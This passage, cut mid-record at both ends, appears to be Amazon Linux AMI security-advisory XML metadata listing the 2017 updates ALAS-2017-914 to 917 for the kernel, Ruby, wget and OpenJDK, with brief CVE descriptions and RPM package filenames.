arch="noarch"><filename>Packages/tomcat80-el-3.0-api-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-lib" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-lib-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-servlet-3.1-api" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-servlet-3.1-api-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-docs-webapp" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-docs-webapp-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-javadoc" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-javadoc-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.82-1.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-914</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-914: important priority package update for kernel</title><issued date="2017-10-26 16:43:00" /><updated date="2017-10-26 23:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15274:
A flaw was found in the implementation of associative arrays where the add_key systemcall and KEYCTL_UPDATE operations allowed for a NULL payload with a nonzero length. When accessing the payload within this length parameters value, an unprivileged user could trivially cause a NULL pointer dereference (kernel oops).
1500391:
CVE-2017-15274 kernel: dereferencing NULL payload with nonzero length
CVE-2017-14991:
The sg_ioctl() function in &#039;drivers/scsi/sg.c&#039; in the Linux kernel, from version 4.12-rc1 to 4.14-rc2, allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for &#039;/dev/sg0&#039;.
1500366:
CVE-2017-14991 kernel: Information leak in the scsi driver
CVE-2017-14340:
A flaw was found where the XFS filesystem code mishandles a user-settable inode flag in the Linux kernel prior to 4.14-rc1. This can cause a local denial of service via a kernel panic.
1491344:
CVE-2017-14340 kernel: xfs: unprivileged user kernel oops
CVE-2017-12192:
CVE-2017-12154:
Linux kernel built with the KVM visualization support (CONFIG_KVM), with nested visualization (nVMX) feature enabled (nested=1), is vulnerable to a crash due to disabled external interrupts. As L2 guest could access (r/w) hardware CR8 register of the host(L0). In a nested visualization setup, L2 guest user could use this flaw to potentially crash the host(L0) resulting in DoS.
1491224:
CVE-2017-12154 Kernel: kvm: nVMX: L2 guest could access hardware(L0) CR8 register
CVE-2017-1000251:
A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges.
1489716:
CVE-2017-1000251 kernel: stack buffer overflow in the native Bluetooth stack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000251" title="" id="CVE-2017-1000251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12154" title="" id="CVE-2017-12154" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12192" title="" id="CVE-2017-12192" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14340" title="" id="CVE-2017-14340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14991" title="" id="CVE-2017-14991" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15274" title="" id="CVE-2017-15274" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.58" release="18.51.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.58-18.51.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-915</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-915: medium priority package update for ruby24</title><issued date="2017-10-26 17:01:00" /><updated date="2018-01-18 20:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14064:
Ruby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can expose arbitrary memory during a JSON.generate call. The issues lies in using strdup in ext/json/ext/generator/generator.c, which will stop after encountering a &#039;\\0&#039; byte, returning a pointer to a string of length zero, which is not the length stored in space_len.
1487552:
CVE-2017-14064 ruby: Arbitrary heap exposure during a JSON.generate call
CVE-2017-14033:
The decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of service (interpreter crash) via a crafted string.
1491866:
CVE-2017-14033 ruby: Buffer underrun in OpenSSL ASN1 decode
CVE-2017-10784:
The Basic authentication code in WEBrick library in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject terminal emulator escape sequences into its log and possibly execute arbitrary commands via a crafted user name.
1492012:
CVE-2017-10784 ruby: Escape sequence injection vulnerability in the Basic authentication of WEBrick
CVE-2017-0903:
A vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter.
1500488:
CVE-2017-0903 rubygems: Unsafe object deserialization through YAML formatted gem specifications
CVE-2017-0902:
RubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking vulnerability that allows a MITM attacker to force the RubyGems client to download and install gems from a server that the attacker controls.
1487589:
CVE-2017-0902 rubygems: DNS hijacking vulnerability
CVE-2017-0901:
RubyGems version 2.6.12 and earlier fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on the filesystem.
1487587:
CVE-2017-0901 rubygems: Arbitrary file overwrite due to incorrect validation of specification name
CVE-2017-0900:
RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications to cause a denial of service attack against RubyGems clients who have issued a `query` command.
1487588:
CVE-2017-0900 rubygems: No size limit in summary length of gem spec
CVE-2017-0899:
RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences.
1487590:
CVE-2017-0899 rubygems: Escape sequence in the "summary" field of gemspec
CVE-2017-0898:
Ruby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious format string which contains a precious specifier (*) with a huge minus value. Such situation can lead to a buffer overrun, resulting in a heap memory corruption or an information disclosure from the heap.
1492015:
CVE-2017-0898 ruby: Buffer underrun vulnerability in Kernel.sprintf
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0898" title="" id="CVE-2017-0898" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0899" title="" id="CVE-2017-0899" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0900" title="" id="CVE-2017-0900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0901" title="" id="CVE-2017-0901" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0902" title="" id="CVE-2017-0902" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0903" title="" id="CVE-2017-0903" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10784" title="" id="CVE-2017-10784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14033" title="" id="CVE-2017-14033" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14064" title="" id="CVE-2017-14064" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby24-devel" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.2-1.30.4.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="1.30.4.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-1.30.4.amzn1.noarch.rpm</filename></package><package name="rubygems24" version="2.6.13" release="1.30.4.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.13-1.30.4.amzn1.noarch.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.4.amzn1.x86_64.rpm</filename></package><package name="rubygems24-devel" version="2.6.13" release="1.30.4.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.13-1.30.4.amzn1.noarch.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-1.30.4.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.0" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.0-1.30.4.amzn1.x86_64.rpm</filename></package><package name="ruby24" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.2-1.30.4.amzn1.x86_64.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.2-1.30.4.amzn1.x86_64.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-1.30.4.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.2-1.30.4.amzn1.x86_64.rpm</filename></package><package name="ruby24-irb" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.2-1.30.4.amzn1.noarch.rpm</filename></package><package name="ruby24-doc" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.2-1.30.4.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-1.30.4.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.0" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.0-1.30.4.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-1.30.4.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.2-1.30.4.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-1.30.4.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.4.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-1.30.4.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.2-1.30.4.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.2-1.30.4.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.2-1.30.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-916</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-916: important priority package update for wget</title><issued date="2017-10-26 19:41:00" /><updated date="2017-10-26 23:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-13090:
A heap-based buffer overflow, when processing chunked encoded HTTP responses, was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.
1505445:
CVE-2017-13090 wget: Heap-based buffer overflow in HTTP protocol handling
CVE-2017-13089:
A stack-based buffer overflow when processing chunked, encoded HTTP responses was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.
1505444:
CVE-2017-13089 wget: Stack-based buffer overflow in HTTP protocol handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13089" title="" id="CVE-2017-13089" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13090" title="" id="CVE-2017-13090" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget" version="1.18" release="3.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.18-3.28.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="3.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.18-3.28.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="3.28.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.18-3.28.amzn1.i686.rpm</filename></package><package name="wget" version="1.18" release="3.28.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.18-3.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-917</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-917: critical priority package update for java-1.8.0-openjdk</title><issued date="2017-10-26 19:46:00" /><updated date="2017-10-26 23:27:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10388:
It was discovered that the Kerberos client implementation in the Libraries component of OpenJDK used the sname field from the plain text part rather than encrypted part of the KDC reply message. A man-in-the-middle attacker could possibly use this flaw to impersonate Kerberos services to Java applications acting as Kerberos clients.
1502038:
CVE-2017-10388 OpenJDK: use of unprotected sname in Kerberos client (Libraries, 8178794)
CVE-2017-10357:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502614:
CVE-2017-10357 OpenJDK: unbounded memory allocation in ObjectInputStream deserialization (Serialization, 8181597)
CVE-2017-10356:
It was discovered that the Security component of OpenJDK generated weak password-based encryption keys used to protect private keys stored in key stores. This made it easier to perform password guessing attacks to decrypt stored keys if an attacker could gain access to a key store.
1503169:
CVE-2017-10356 OpenJDK: weak protection of key stores against brute forcing (Security, 8181692)
CVE-2017-10355:
It was found that the FtpClient implementation in the Networking component of OpenJDK did not set connect and read timeouts by default. A malicious FTP server or a man-in-the-middle attacker could use this flaw to block execution of a Java application connecting to an FTP server.
1502869:
CVE-2017-10355 OpenJDK: no default network operations timeouts in FtpClient (Networking, 8181612)
CVE-2017-10350:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAX-WS). Supported versions that are affected are Java SE: 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502640:
CVE-2017-10350 OpenJDK: unbounded memory allocation in JAXWSExceptionBase deserialization (JAX-WS, 8181100)
CVE-2017-10349:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502611:
CVE-2017-10349 OpenJDK: unbounded memory allocation in PredicatedNodeTest deserialization (JAXP, 8181327)
CVE-2017-10348:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502629:
CVE-2017-10348 OpenJDK: multiple unbounded memory allocations in deserialization (Libraries, 8181432)
CVE-2017-10347:
Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502632:
CVE-2017-10347 OpenJDK: unbounded memory allocation in SimpleTimeZone deserialization (Serialization, 8181323)
CVE-2017-10346:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1501873:
CVE-2017-10346 OpenJDK: insufficient loader constraints checks for invokespecial (Hotspot, 8180711)
CVE-2017-10345:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L).
1502858:
CVE-2017-10345 OpenJDK: unbounded resource use in JceKeyStore deserialization (Serialization, 8181370)
CVE-2017-10295:
It was found that the HttpURLConnection and HttpsURLConnection classes in the Networking component of OpenJDK failed to check for newline characters embedded in URLs. An attacker able to make a Java application perform an HTTP request using an attacker provided URL could possibly inject additional headers into the request.
1502687:
CVE-2017-10295 OpenJDK: HTTP client insufficient check for newline in URLs (Networking, 8176751)
CVE-2017-10285:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1501868:
CVE-2017-10285 OpenJDK: incorrect privilege use when handling unreferenced objects (RMI, 8174966)
CVE-2017-10281:
